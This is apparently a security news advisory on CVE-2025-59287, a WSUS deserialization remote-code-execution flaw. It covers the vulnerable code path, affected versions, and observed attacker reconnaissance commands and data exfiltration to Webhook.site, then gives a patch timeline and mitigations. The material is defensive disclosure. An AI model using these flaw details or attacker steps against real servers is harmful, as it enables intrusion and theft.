A critical, unauthenticated Remote Code Execution (RCE) vulnerability, CVE-2025-59287, in Microsoft’s Windows Server Update Services (WSUS) is being actively exploited right now, allowing attackers to run malicious code with SYSTEM privileges. Security researchers like Unit 42 spotted the attacks within hours of Microsoft’s emergency patch release, and CISA has already added it to its Known Exploited Vulnerabilities (KEV) Catalog, urging immediate action for all affected Windows Server versions.
Microsoft’s Windows Server Update Services (WSUS) just got hit with a critical, unauthenticated Remote Code Execution (RCE) vulnerability, tracked as CVE-2025-59287. This isn’t just another bug; it’s a gaping hole that lets attackers execute arbitrary code with SYSTEM privileges on affected servers—no login needed. The CVSS v3.1 score of 9.8 (CRITICAL) from Microsoft Corporation tells you everything you need to know about the severity. What really sets this apart? Active exploitation was seen in the wild by Unit 42 almost immediately after an emergency patch dropped. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) wasted no time, adding this CVE to its Known Exploited Vulnerabilities (KEV) Catalog on October 24, 2025. That move alone signals extreme urgency.
The Critical WSUS Vulnerability: CVE-2025-59287 Explained
The heart of CVE-2025-59287 is an unsafe deserialization of untrusted data within the WSUS component. Think of it like this: the server is told to read and process some data, but it trusts that data too much, executing whatever it’s given without proper checks.
Researchers at HawkTrace detailed exactly how this plays out. It happens when AuthorizationCookie objects are sent to the GetCookie() endpoint. The problem? Encrypted cookie data gets decrypted using AES-128-CBC and then—crucially—deserialized via BinaryFormatter without the necessary type validation. This means an attacker can slip in malicious code inside what looks like normal cookie data, and the server just runs it. Unit 42 also flagged another way attackers are getting in: targeting the ReportingWebService to trigger unsafe deserialization, but this time using SoapFormatter. Either way, it’s a direct path for a remote, unauthenticated attacker to run malicious code with SYSTEM privileges.
Specifically, the DecryptData method in Microsoft.UpdateServices.Internal.Authorization.EncryptionHelper is the weak link. If the decrypted data isn’t UnencryptedCookieData, it’s fed straight into BinaryFormatter.Deserialize(). No adequate type checks. Nothing to stop arbitrary encrypted payloads from being deserialized and executed. It’s a fundamental security breakdown.
This vulnerability impacts a wide range of Microsoft Windows Server versions, specifically any server with the WSUS Server Role enabled:
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016 (up to, excluding 10.0.14393.8524)
- Microsoft Windows Server 2019 (up to, excluding 10.0.17763.7922)
- Microsoft Windows Server 2022 (up to, excluding 10.0.20348.4297)
- Microsoft Windows Server 2022 23H2 Edition (up to, excluding 10.0.25398.1916)
- Microsoft Windows Server 2025 (up to, excluding 10.0.26100.6905)
Active Exploitation and Its Damaging Reach
CVE-2025-59287 isn’t theoretical; it’s a live threat right now. This unauthenticated RCE, paired with SYSTEM privileges in a ubiquitous enterprise service, is a dream for attackers and a nightmare for organizations. Compromising a WSUS server isn’t just about one machine; it’s a strategic entry point, giving attackers a prime position for lateral movement and potentially taking over an entire network, as Unit 42 analysts pointed out.
Unit 42’s boots-on-the-ground analysis of observed attacks paints a clear picture: attackers are honing in on publicly exposed WSUS instances, usually on default TCP ports 8530 (HTTP) and 8531 (HTTPS). They’re executing malicious PowerShell commands, often as child processes of wsusservice.exe or w3wp.exe, which then launch cmd.exe and powershell.exe. The initial goal is pure reconnaissance: whoami, net user /domain, ipconfig /all. They want to map the network, identify high-value accounts, and understand the domain structure. Once they have that intel, it’s quickly exfiltrated to attacker-controlled Webhook.site endpoints using more PowerShell.
Palo Alto Networks’ Cortex Xpanse found roughly 5,500 WSUS instances exposed to the internet. That’s a massive global attack surface. Unit 42 rightly stresses that exposing an internal-facing service like WSUS to the public internet isn’t just a mistake; it’s a critical misconfiguration. It transforms a localized server vulnerability into a potential enterprise-wide disaster, a supply-chain compromise waiting to happen.
What to Do Now: Patches and Urgent Recommendations
The timeline for this vulnerability is brutal:
- October 14, 2025: The NVD entry for CVE-2025-59287 went live. Microsoft released an initial patch during its October Patch Tuesday.
- October 23, 2025: That first patch didn’t quite cut it. Microsoft had to release an emergency out-of-band security update.
- October 23, 2025 (within hours of patch): Barely a moment after the emergency patch, Unit 42 and other researchers saw active exploitation.
- October 24, 2025: CISA slapped CVE-2025-59287 onto its Known Exploited Vulnerabilities (KEV) Catalog.
- October 28, 2025: NVD record for CVE-2025-59287 last modified.
Microsoft Corporation, as the CVE Numbering Authority, first disclosed the vulnerability and quickly pushed out patches. HawkTrace provided the deep technical dive, complete with a Proof-of-Concept, breaking down the unsafe deserialization flaw. Unit 42 (Palo Alto Networks) has been critical in monitoring and reporting the active exploitation, offering crucial analysis of attack methods. And CISA’s KEV Catalog addition underscores just how serious this threat is.
Given that this vulnerability is being actively exploited right now, organizations absolutely must apply the latest security updates from Microsoft to all affected WSUS servers. Immediately. If you can’t patch instantly, at least get some interim mitigations in place: disable the WSUS server role if possible, or block the high-risk ports (like 8530 and 8531) associated with WSUS. Experts can’t stress this enough: strong network segmentation is vital. It’s the kind of basic cyber hygiene that keeps a single server vulnerability from bringing down an entire company. For those with Palo Alto Networks security products, Unit 42 has already provided protective measures and threat hunting queries to detect and prevent exploitation.